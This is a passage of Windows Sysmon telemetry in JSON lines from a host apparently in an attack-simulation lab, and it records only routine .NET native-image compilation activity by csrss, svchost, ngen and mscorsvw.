07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.873\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-001074480F00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.873","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-001074480F00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.873\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-001074480F00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.873","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-001074480F00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:16.904\r\nProcessGuid: {E2A3D6B1-1378-5F25-0000-001074480F00}\r\nProcessId: 4248\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1098-0\\System.Net.Http.WebRequest.dll\r\nCreationUtcTime: 2020-08-01 07:02:16.904","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:16.904","ProcessGuid":"{E2A3D6B1-1378-5F25-0000-001074480F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1098-0\\System.Net.Http.WebRequest.dll","CreationUtcTime":"2020-08-01 07:02:16.904","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1342-5F25-0000-001073AE0D00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1342-5F25-0000-001073AE0D00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1342-5F25-0000-001073AE0D00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1342-5F25-0000-001073AE0D00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010214C0F00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010214C0F00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.966\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010FA4E0F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.966","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010FA4E0F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8491,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.966\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010FA4E0F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.966","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010FA4E0F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:16.966\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1378-5F25-0000-0010FA4E0F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:16.966","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1378-5F25-0000-0010FA4E0F00}","TargetProcessId":"4772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
